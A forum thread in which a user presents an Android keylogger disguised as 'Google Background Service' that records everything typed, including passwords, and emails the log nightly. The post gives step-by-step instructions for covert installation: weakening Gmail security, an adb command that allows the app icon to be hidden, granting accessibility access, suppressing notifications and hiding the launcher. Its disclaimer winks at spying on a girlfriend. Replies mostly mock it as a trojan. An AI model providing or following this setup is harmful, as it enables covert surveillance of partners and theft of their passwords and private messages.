I have developed an android application that logs everything you type (relationshipcel GIH)

Deleted member 7753

Deleted member 7753

If you only knew how good things really were
Presenting: Google Background Service, an application that logs everything you type (incl autofill and autocorrect text) and sends you the log every night at midnight via email. Links at the bottom of the thread.

Disclaimer: THIS IS MEANT FOR YOUR OWN USE ONLY. USING THIS TO LOG SOMEONE'S KEYSTROKES OTHER THAT YOURSELF IS ILLEGAL IN VIRTUALLY EVERY NATION UNLESS YOU HAVE A COURT ORDER. DO NOT USE THIS TO MONITOR OTHER PEOPLE, SOMEONE LIKE YOUR GIRLFRIEND (;)). I AM NOT TO BE HELD RESPONSIBLE FOR YOUR ACTIONS.

Links at the end of the thread.

Requirements:

• Android 8 and later (Can be installed in versions 5.1 - 7 but it is untested).
  • A gmail account, both email and password. Other email service providers are not supported.
  • A different email that will be receiving the logs. Password not required.
  • Android 10 and later only: a computer with adb installed (link here). USB Debugging enabled on the target device.
PART 0:

1. Go to your gmail account that will be sending the mails everyday and allow it to run on less secure apps, direct link HERE.
  2. Disable display unlock captcha as well. Direct link HERE.

I recommend you make a new gmail account instead of using one you already have. In case things go south, you can simply discard it completely.

PART 1 (For android 10 and later. If your device is running a version older than android 10, skip to part 2):

1. Connect your device to your computer.
  2. Navigate to the directory containing the adb executable (Alternatively you can add it to your PATH).
  3. Open your command prompt/terminal and navigate to the same folder (Alternatively, if you've added the directory to your path, you can simply open the terminal and proceed to the next step).
  4. Unlock your device.
  5. On the terminal/cmd in your computer, type adb devices. You should see a "device" text followed by a random string of numbers and letters. If you don't, make sure you have USB debugging enabled, your device authorised and your device is unlocked. If the issue persists, see if your device requires drivers to be installed.
  6. Copy and paste the following command [SIZE=5]adb shell settings put global show_hidden_icon_apps_enabled 0[/SIZE]. This will disable a feature introduced in android 10 which prohibits obscuration of apps' launchers. To reveal them, replace the 0 at the end of the command with a 1.
  7. Type adb reboot, to reboot your device.
  8. Once rebooted, you can unplug your device from the computer.
PART 2:
  1. Install the application on the device.
  2. Once installed, open it.
  3. Once open, leave the application and head into your settings. Look for your "accessibility" setting.
  4. Locate the "Google Background Service" app, and enable the accessibility permission. It might warn you that it might be used for malicious purposes, which isn't the case (source code at the bottom of the thread).
  5. Once enabled, make sure you disable any kind of battery optimisation imposed on the application by default. Make sure you also enable the "Launch at startup" setting if it exists on your device (I know Xiaomi has such a setting).
  6. Disable notifications of the application.
  7. Open the application once again.
  8. Once open, give it your name (or any name. This name will only be used in the body of the email that will be sent so it looks less suspicious), the sending email and email password and finally the receiving email. Make sure everything is correct. Once the application is hidden, you'll have to repeat this part again if you've made a mistake.
  9. Once all the fields are filled, press the "create" button. This will create a data file with your information and give you the path in a toast message. It is inaccessible without root privileges, so rest assured, it is safe.
  10. You can now press the "send" button to see if everything is running properly. An email will be sent to you with everything you've typed so far. If you don't receive an email, make sure you are connected to the internet and that your credentials are correct.
  11. Once you've verified that your credentials are correct, you can press the "hide" button to hide the application launcher. The application cannot be opened anymore and it will be running in the background the entire time. If the device is shutdown, the application will be launched automatically in the background upon boot. If the device has no internet connection at midnight, it will send the email once it find an internet connection.

Known Issues

1. Password fields with visibility disabled aren't sufficiently logged when typed rapidly.

2. Passwords typed in fields with visibility disabled take up multiple lines in the final file

3. Auto-corrected texts are appended in a seprate line instead of replacing the previous one.

4. Certain text fields aren't logged properly or at all (e.g. Youtube search field)

5. Deleting the text in a field by using backspace doesn't sufficiently clear the appended text from the file.

-> Fixing this issue causes the unintended side effect of not logging everything typed in a text field. I've managed to fix this however I decided not to implement it in the final package as I suspect the users of this application will prefer having more logs than a less bloated final log file.

6. Characters accented through an auto-correct or autofill feature will not replace already existing lines, causing the text to be added to a new line upon change instead of replacing prexisting text. To my knowledge, this issue only affects the Latin, Cyrillic and Greek alphabets.

Link to the application:

This application is open source. You can download it from the link below.

• +1
  • Love it
Reactions: thecel, gamma and Deleted member 12303
Over if u think women use android

• JFL
  • +1
Reactions: RealSurgerymax, Rasputin and Spartacus1-
MIRIN TROJAN LINKED

Imagine downloading shit from an unknown source :lul:

• JFL
Reactions: Petsmart
BF77E76C 1AED 40AD B2D6 6BDE82D4514B

And you get a copy too right?

• JFL
Reactions: Rasputin
Ion downloading an app made by a .me user.

• JFL
Reactions: Rasputin
If you wanna see my dick on the camera roll it's easier asking for it